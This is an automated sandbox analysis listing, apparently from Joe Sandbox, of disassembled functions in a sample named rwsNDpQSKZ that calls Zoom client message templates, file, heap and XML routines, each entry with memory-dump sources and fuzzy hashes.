                Function 00C74900 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 22windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C74907
                • ??0?$CmmMessageTemplate_3@V?$CStringT@_W@Cmm@@V12@_J@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.app.conf.invite.buddy.to.meeting,0000277F,UserID,MeetingID,MeetingNum,00000004), ref: 00C7492A
                  • Part of subcall function 00C93CF0: __EH_prolog3.LIBCMT ref: 00C93CF7
                  • Part of subcall function 00C93CF0: ??0?$CmmMessageTemplate_2@V?$CStringT@_W@Cmm@@V12@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C7492F,com.Zoom.app.conf.invite.buddy.to.meeting,0000277F,UserID,MeetingID,MeetingNum,00000004), ref: 00C93D0D
                  • Part of subcall function 00C93DB3: __EH_prolog3_GS.LIBCMT ref: 00C93DBA
                  • Part of subcall function 00C93DB3: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C74956), ref: 00C93DCE
                  • Part of subcall function 00C93DB3: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.invite.buddy.to.meeting,00000044), ref: 00C93E00
                  • Part of subcall function 00C93DB3: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C93E3D
                  • Part of subcall function 00C93DB3: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.invite.buddy.to.meeting,?), ref: 00C93E6F
                  • Part of subcall function 00C93DB3: EnterCriticalSection.KERNEL32(00000044), ref: 00C93EE1
                  • Part of subcall function 00C93DB3: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C93EFE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@TreeV12@@V12@_
                • String ID: MeetingID$MeetingNum$UserID$com.Zoom.app.conf.invite.buddy.to.meeting
                • API String ID: 304435404-3353022223
                • Opcode ID: 15f83f4f65b801a33e4d6e458efed56c487d0a3d8648665696efe301327ad0f0
                • Instruction ID: 18920082882ba4a8c67e469dad3b88e37a33e33362371a8d404dfbf28510b693
                • Opcode Fuzzy Hash: 15f83f4f65b801a33e4d6e458efed56c487d0a3d8648665696efe301327ad0f0
                • Instruction Fuzzy Hash: E8E092B1A447906ADB00BB55DC0A72972709B00B15F508528F6141A2D5CBF40648DAB2
                Function 00C6EDA0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 22windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6EDA7
                • ??0?$CmmMessageTemplate_3@V?$CStringT@D@Cmm@@IH@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.zoom.app.assistant.virtualaudio.message.indentify.device.response,00009DDB,deviceID,deviceType,result,00000004), ref: 00C6EDCA
                  • Part of subcall function 00C8EA00: __EH_prolog3.LIBCMT ref: 00C8EA07
                  • Part of subcall function 00C8EA00: ??0?$CmmMessageTemplate_2@V?$CStringT@D@Cmm@@I@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C8E925,?,?,?,?,?,00000004,00C7B838,?,?,?), ref: 00C8EA1D
                  • Part of subcall function 00C8EF56: __EH_prolog3_GS.LIBCMT ref: 00C8EF5D
                  • Part of subcall function 00C8EF56: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6EDF6), ref: 00C8EF71
                  • Part of subcall function 00C8EF56: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.indentify.device.response,00000044), ref: 00C8EFA3
                  • Part of subcall function 00C8EF56: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C8EFE0
                  • Part of subcall function 00C8EF56: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.virtualaudio.message.indentify.device.response,?), ref: 00C8F012
                  • Part of subcall function 00C8EF56: EnterCriticalSection.KERNEL32(00000044), ref: 00C8F084
                  • Part of subcall function 00C8EF56: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C8F0A1
                Strings
                • com.zoom.app.assistant.virtualaudio.message.indentify.device.response, xrefs: 00C6EDC5
                • result, xrefs: 00C6EDB1
                • deviceID, xrefs: 00C6EDBB
                • deviceType, xrefs: 00C6EDB6
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: com.zoom.app.assistant.virtualaudio.message.indentify.device.response$deviceID$deviceType$result
                • API String ID: 2152042629-2938886702
                • Opcode ID: f776b7a7f31a7752a31271fa4652f81fe6c44da559a807697c416b3610a32992
                • Instruction ID: 43d9a260c7202fc8d1bc3e2c6b0cfa55fdbd10413eb4254d741fb7b225808c66
                • Opcode Fuzzy Hash: f776b7a7f31a7752a31271fa4652f81fe6c44da559a807697c416b3610a32992
                • Instruction Fuzzy Hash: B7E0D871B81790ABD710BF944C0772D3660AB00B98F40485DB2101A7D1CBF44508F77E
                Function 00C76D60 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 22windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76D67
                • ??0?$CmmMessageTemplate_3@IV?$CStringT@_W@Cmm@@H@Archive@Cmm@@QAE@PBDH000@Z.RWSNDPQSKZ(com.Zoom.conf.start.download.component,000027B2,componentType,requestID,isForce,00000004), ref: 00C76D8A
                  • Part of subcall function 00C95FE0: __EH_prolog3.LIBCMT ref: 00C95FE7
                  • Part of subcall function 00C95FE0: ??0?$CmmMessageTemplate_2@IV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH00@Z.RWSNDPQSKZ(?,?,?,?,00000004,00C76D8F,com.Zoom.conf.start.download.component,000027B2,componentType,requestID,isForce,00000004), ref: 00C95FFD
                  • Part of subcall function 00C960A0: __EH_prolog3_GS.LIBCMT ref: 00C960A7
                  • Part of subcall function 00C960A0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C76DB6), ref: 00C960BB
                  • Part of subcall function 00C960A0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.conf.start.download.component,00000044), ref: 00C960ED
                  • Part of subcall function 00C960A0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C9612A
                  • Part of subcall function 00C960A0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.conf.start.download.component,?), ref: 00C9615C
                  • Part of subcall function 00C960A0: EnterCriticalSection.KERNEL32(00000044), ref: 00C961CE
                  • Part of subcall function 00C960A0: LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C961EB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$Archive@String$Archive$CriticalH_prolog3MessagePackageSectionTree@$Cmm@@@EnterH000@H00@H_prolog3_LeaveNode@23@Root@Template_2@Template_3@Tree
                • String ID: com.Zoom.conf.start.download.component$componentType$isForce$requestID
                • API String ID: 111817187-4212277253
                • Opcode ID: aa3b912e027dcda85135ee0ca20dbd7cee8fe586f99551db395a2e7b9b053d19
                • Instruction ID: 013422d16fc2d97efa25fdfc3cabc17646b10570305956eab9ad1dac244cbc93
                • Opcode Fuzzy Hash: aa3b912e027dcda85135ee0ca20dbd7cee8fe586f99551db395a2e7b9b053d19
                • Instruction Fuzzy Hash: BBE0D8B1744744ABDF21BBA9DC4F75D76B09B04B58F80846DF5045A2C2CBF00908DB79
                Function 00CB65BB Relevance: 9.1, APIs: 6, Instructions: 132COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB65C5
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,000000E8,00CB73B3,?,?,?,?,?,?,?,?,?), ref: 00CB664B
                • ??0?$CStringT@D@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,00000000,?,000000E8,00CB73B3,?,?,?,?,?,?,?,?), ref: 00CB665D
                • ??H?$CStringT@D@Cmm@@QBE?AV01@ABV01@@Z.RWSNDPQSKZ(?,?,?,?,?,?,00000000,?,000000E8,00CB73B3,?,?,?,?,?,?), ref: 00CB6683
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@StringV01@@$??0?$$H_prolog3_V01@
                • String ID:
                • API String ID: 469307732-0
                • Opcode ID: 45fefa41ce692b471f5e4c5ca41fe7a9a778cdd48c23ef79975859943a5229f7
                • Instruction ID: 2e494c3b2d96810241bb6989f30043d4c779f0919d9a667d9ea46e53abb14a56
                • Opcode Fuzzy Hash: 45fefa41ce692b471f5e4c5ca41fe7a9a778cdd48c23ef79975859943a5229f7
                • Instruction Fuzzy Hash: B7515D75900219AFCB25DF60C991AEEB3B8FF14304F1084AAE856B7251DF34AE49DF60
                Function 00C62E50 Relevance: 9.1, APIs: 6, Instructions: 118COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C62E5A
                • ?cmm_fs_read@@YAHPB_WAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.RWSNDPQSKZ(?,?,000000D8), ref: 00C62E66
                  • Part of subcall function 00C62D90: __EH_prolog3_GS.LIBCMT ref: 00C62D97
                  • Part of subcall function 00C62D90: ?GetSize@CFile@Cmm@@QBE_KXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DE5
                  • Part of subcall function 00C62D90: ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DEF
                  • Part of subcall function 00C62D90: ?Read@CFile@Cmm@@QAEIPAXI@Z.RWSNDPQSKZ(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62DF8
                  • Part of subcall function 00C62D90: ?Close@CFile@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 00C62E34
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000000,00000002,00000001), ref: 00C62EB6
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?), ref: 00C62F07
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,00000000), ref: 00C62F49
                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00C62FAE
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$File@State@Unlock@$?cmm_fs_read@@Buffer@?$Close@D@2@@std@@@D@std@@H_prolog3H_prolog3_Ios_base_dtorRead@Size@StringU?$char_traits@V?$allocator@V?$basic_string@std::ios_base::_
                • String ID:
                • API String ID: 3644761214-0
                • Opcode ID: 803ce419cf4fb486c6b9881fac0e19f9e338be14d2c79f9c74d167e93cfe6dc3
                • Instruction ID: 55d8960a49632a2ed495e20c903058fd80133e15145b2683fc8294cb1ac00a47
                • Opcode Fuzzy Hash: 803ce419cf4fb486c6b9881fac0e19f9e338be14d2c79f9c74d167e93cfe6dc3
                • Instruction Fuzzy Hash: FF413931D0062A9BCF20DFA8C981ADDB7B5FF08314F1481AAE515B7241DB70AE45CFA1
                Function 00CE235F Relevance: 9.1, APIs: 6, Instructions: 92COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CE2366
                  • Part of subcall function 00CDC00B: GetProcessHeap.KERNEL32(?,00000000,00CDD955,00000004,00CDD727,00DFFBA8,?,?,?,?,00CDCB1F,00DFFB90,?), ref: 00CDC037
                  • Part of subcall function 00CDCE9E: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,80004005,?,?,?,80070057,?,00CDCCE1,00000000,?,?,80070057,00000000), ref: 00CDCEB4
                • _wcschr.LIBVCRUNTIME ref: 00CE238F
                • _wcschr.LIBVCRUNTIME ref: 00CE23BF
                • CreateDirectoryW.KERNEL32(?,00000000,00000000,00000000,00000008,00CE0EEA,?,00000000,0000000C,80070057,?,?), ref: 00CE2412
                • GetLastError.KERNEL32(?,00000000,0000000C,80070057,?,?), ref: 00CE241C
                • GetFileAttributesW.KERNEL32(?,?,00000000,0000000C,80070057,?,?), ref: 00CE242A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: _wcschr$AttributesCmm@@CreateDirectoryErrorFileH_prolog3HeapLastProcessState@Unlock@
                • String ID:
                • API String ID: 3223584605-0
                • Opcode ID: 3585de6667388023143ceda400958a7852f19dc8e4f14003ef3db301b76da0a2
                • Instruction ID: e01bec1174c64e1a96782a54b054a9fc3f2c9bea734da3ca8310b4b601eb5c0c
                • Opcode Fuzzy Hash: 3585de6667388023143ceda400958a7852f19dc8e4f14003ef3db301b76da0a2
                • Instruction Fuzzy Hash: 963138325006859BDB19DBA9CC95BED776CAF50324F20421EF126972D1DF30AA05DB51
                Function 00CB2EA0 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                Download Yara Rule
                APIs
                • ?SealElementIfJustOpened@XMLPrinter@tinyxml2@@IAEXXZ.RWSNDPQSKZ ref: 00CB2EA8
                  • Part of subcall function 00CB3270: ?Putc@XMLPrinter@tinyxml2@@IAEXD@Z.RWSNDPQSKZ(0000003E,00CB35AB,?,?,00CB2E8C,xml version="1.0"), ref: 00CB327C
                • ?Putc@XMLPrinter@tinyxml2@@IAEXD@Z.RWSNDPQSKZ(0000000A), ref: 00CB2F24
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?), ref: 00CB2F33
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBDI@Z.RWSNDPQSKZ(00D333A0,00000001), ref: 00CB2F46
                • ?Write@XMLPrinter@tinyxml2@@IAEXPBD@Z.RWSNDPQSKZ(?,00D333A0,00000001), ref: 00CB2F4E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Printer@tinyxml2@@$Putc@Write@$Cmm@@ElementJustOpened@SealState@Unlock@
                • String ID:
                • API String ID: 2363765950-0
                • Opcode ID: 7a6723998683841eb857a0c41d6520c26ef88275d1670b49f04fb273f24f7f40
                • Instruction ID: c7820e0d96aa403fc1e05576901a7ec78db41d868841ebb590f3ec4b32895bf7
                • Opcode Fuzzy Hash: 7a6723998683841eb857a0c41d6520c26ef88275d1670b49f04fb273f24f7f40
                • Instruction Fuzzy Hash: 6C21CF30200656BFDB159F26C585ABAFBA5FF44324F44801AE90647A81CB71B8A5DBD0
                Function 00CDC300 Relevance: 9.1, APIs: 6, Instructions: 67memoryCOMMON
                Download Yara Rule
                APIs
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00CE0220), ref: 00CDC31C
                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC32E
                • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC335
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC353
                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC35F
                • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,00CE0220), ref: 00CDC366
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$ByteCharMultiProcessWide$AllocFree
                • String ID:
                • API String ID: 1621643742-0
                • Opcode ID: a83dc9a52ede66ab4ba76fdc02e670ae88f96bc535d6c4b9f892c4728850966a
                • Instruction ID: c9ace1a3f7e8f1a7a695f96addad46d38702aa3ea971d6aa28bf41e0e7c4cf06
                • Opcode Fuzzy Hash: a83dc9a52ede66ab4ba76fdc02e670ae88f96bc535d6c4b9f892c4728850966a
                • Instruction Fuzzy Hash: CA113AB5500201BFDB219B66DC48DAB7BBDEBCAB10B108119FA15C2260DB70DA02DA70
                Function 00C5E2A0 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                Download Yara Rule
                APIs
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,00C5C592,?,?), ref: 00C5E2BE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,00C5C592,?,?), ref: 00C5E2D4
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,?,?,00C5C592,?,?), ref: 00C5E2EE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,80000041,00000000,?,?,?,00C5C592,?,?), ref: 00C5E30D
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,00C5C592,?,?), ref: 00C5E321
                • #23.MAPI32(?,?,?,00C5C592,?,?), ref: 00C5E32C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@State@Unlock@
                • String ID:
                • API String ID: 3914272143-0
                • Opcode ID: 12b928658e030a9c71e3babdfc9a8b86274852f4e86589978ec45bac2e9a0ddf
                • Instruction ID: f34590280e8338918677ed1e716e8438590a079314ce1f7fcf95473d14615418
                • Opcode Fuzzy Hash: 12b928658e030a9c71e3babdfc9a8b86274852f4e86589978ec45bac2e9a0ddf
                • Instruction Fuzzy Hash: 0D111975600A25AFC708DF69D884859BBB9FF48315304816EE91AD7720CB30BD51CFA4
                Function 00CE838A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,00CE8381,00CE9663,?,00CDEE37,00CE0570,?,?), ref: 00CE8398
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CE83A6
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CE83BF
                • SetLastError.KERNEL32(00000000,00CE8381,00CE9663,?,00CDEE37,00CE0570,?,?), ref: 00CE8411
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
